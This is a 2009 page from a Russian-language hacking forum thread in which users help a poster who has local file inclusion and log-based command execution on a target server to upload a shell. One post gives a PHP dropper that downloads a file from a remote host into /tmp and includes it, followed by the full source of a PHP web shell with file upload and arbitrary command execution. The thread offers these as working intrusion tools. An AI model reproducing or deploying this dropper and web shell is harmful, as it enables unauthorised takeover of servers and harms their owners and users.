HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 830 из 2438 « Первая < 330730780820 826 827 828 829 830 831 832 833 834 84088093013301830 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8291  
Старый 29.07.2009, 11:59
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию
Цитата:
Сообщение от mailbrush  
Кто вам вообще сказал, что у него шелл или инъекция? МБ он через SSH залить хочет, но все ф-ции заливки не работают.
Ппц гуру, где твоя хакерская догадка, откуда он знает что нет качалок, в ssh не работает echo?, в ssh проще уже через ftp клиент подцепить его.
 
Ответить с цитированием

  #8292  
Старый 29.07.2009, 12:03
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию
Цитата:
Сообщение от nemaniak  
но ведь не всегда возможно такое протянуть через get запрос, размер данных не мал для гета...
Размер етого шелла- 3.8кб, ради интереса посмотрел, криптованый-1.9КБ, если что-то может помешать то ето Warning: gzinflate(), но ето бывает 2:10

Есть испольнения комманд и аплоадер файлов.
Последний раз редактировалось The_HuliGun; 29.07.2009 в 12:08..
 
Ответить с цитированием

  #8293  
Старый 29.07.2009, 12:16
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
Выполняю команды через логи. Проверил все мне известные, нифига. Сейчас попробую то, что вы тут насоветывали
 
Ответить с цитированием

  #8294  
Старый 29.07.2009, 12:21
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
откуда он знает что нет качалок
which wget... which lynx, etc...
 
Ответить с цитированием

  #8295  
Старый 29.07.2009, 12:22
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
твою ж мать =\
Fatal error: Call to undefined function: gzinflate() in
А без него разумеется не хочет...
Последний раз редактировалось Tigger; 29.07.2009 в 12:25..
 
Ответить с цитированием

  #8296  
Старый 29.07.2009, 12:23
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
ну праильно, судя по тому, что качалок нет - можно было понять что присутствие gzinflate маловероятно ))
лей обычный шелл.
 
Ответить с цитированием

  #8297  
Старый 29.07.2009, 12:26
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
в смысле лить обычный шелл? у меня есть LFI, нашел логи, там выполнял команды... в смысле лить обычный шелл? о_0
 
Ответить с цитированием

  #8298  
Старый 29.07.2009, 12:26
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Tigger
allow_url_fopen on\off ?

copy() никто не отменял
 
Ответить с цитированием

  #8299  
Старый 29.07.2009, 12:36
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию
Я еще пользовался такой фишкой, когда небыло качалок и удаленных инклудов:
Код:
<?php
if (isset($_GET[p]))
{
 $f=fopen('/tmp/qwerty','w+');
 fwrite($f,file_get_contents('http://www.youhost/upl.inc'));
}
include('/tmp/qwerty');
?>
Надеюсь понятно. залей на хост upl.inc, той что я тебе советол через echo, и етот скрипт через есho бросай на серв, дожно проканать=)

В том аплоадере просто хтмл код, нужно было закриптовать.., а так посредствами php можно будет стянуть и проинклудить локально.
shell.php?p

По теме, пускай буде, если вдруг кому нибудь пригодится. Больше ничем не могу помочь по даному вопросу.
upl.inc:
Код:
<html>
<head>
<title>uploader</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
<!--
body {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px}
a {  color: #000000; text-decoration: none}
a:hover {  color: #000066; text-decoration: underline}
-->
</style>
</head>

<body bgcolor="#999999" text="#000000">
<center>
  <table width="700" border="0" bgcolor="#000066">
    <tr>
      <td>
        <table width="100%" border="0" bgcolor="#CCCCCC">
          <tr>
            <td>
              <p><font size="2"><b><font color="#FF0000">&nbsp;&nbsp;&nbsp;System:
                <font color="#000000">
                <? passthru("uname -a"); ?>
                </font><br>
                &nbsp;&nbsp;&nbsp;Our permissions: <font color="#000000">
                <? passthru("id"); ?>
                </font><br>
                &nbsp;&nbsp;&nbsp;Our locality: <font color="#000000">
                <? passthru("pwd"); ?>
                </font></font></b></font></p>

<pre>
<?php

// FILE UPLOAD
$uploaded = $_FILES['userfile']['tmp_name'];
if (file_exists($uploaded)) {
   $pwd_dir = $_POST['dira'];
   $real = $_FILES['userfile']['name'];
   $destination = $pwd_dir."/".$real;
   copy($uploaded, $destination);
   echo "Uploaded process:";
   print_r ($_FILES);
   echo "FILE UPLOADED TO $destination";
} else {
    echo "&nbsp;&nbsp;No file uploaded";
}
?>     </pre> <form name="form1" method="post" enctype="multipart/form-data">
                <table width="100%" border="0">
                  <tr>
                    <td width="35%"><font size="2"><b>&nbsp;&nbsp;Browse file
                      to upload:</b></font></td>
                    <td width="65%">
                      <input type="file" name="userfile" size="45">
                    </td>
                  </tr>
                  <tr>
                    <td width="35%"><b><font size="2">&nbsp;&nbsp;Destination:</font></b></td>
                    <td width="65%">
                      <input type="text" name="dira" size="45" value="<? passthru("pwd"); ?>">
                      <input type="submit" name="submit2" value="upload">
                    </td>
                  </tr>
                  <tr>
                    <td width="35%">
                      <div align="right"> </div>
                    </td>
                    <td width="65%">&nbsp; </td>
                  </tr>
                  <tr>
                    <td width="35%"><b><font size="2">&nbsp;&nbsp;Command to execute:</font></b></td>
                    <td width="65%">
                      <input type="text" name="cmd" size="45" value="<? echo $_POST['cmd']; ?>">
                      <input type="submit" name="submit" value="execute">
                    </td>
                  </tr>
                  <tr>
                    <td width="35%">
                      <div align="right"> </div>
                    </td>
                    <td width="65%">&nbsp; </td>
                  </tr>
                </table>
              </form>
              <p>
                          <pre>
                          <?
                          // command output
                                if ($_POST['cmd']){
                          $cmd = stripslashes($_POST['cmd']);
                          echo "$cmd executed...<br>";
                          passthru("$cmd");
                          }
                          else {
                          echo "No shell command executed";
                          }

                          ?></pre>



              <div align="right"> <font size="1"><b>2003 &copy; </b></font> </div>
            </td>
          </tr>
        </table>
      </td>
    </tr>
  </table>
</center>
</body>
</html>
Последний раз редактировалось The_HuliGun; 29.07.2009 в 13:27..
 
Ответить с цитированием

  #8300  
Старый 29.07.2009, 13:24
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию
jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет...

Хулиган, тебя я немного не понял.
 
Ответить с цитированием
Ответ
Страница 830 из 2438 « Первая < 330730780820 826 827 828 829 830 831 832 833 834 84088093013301830 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ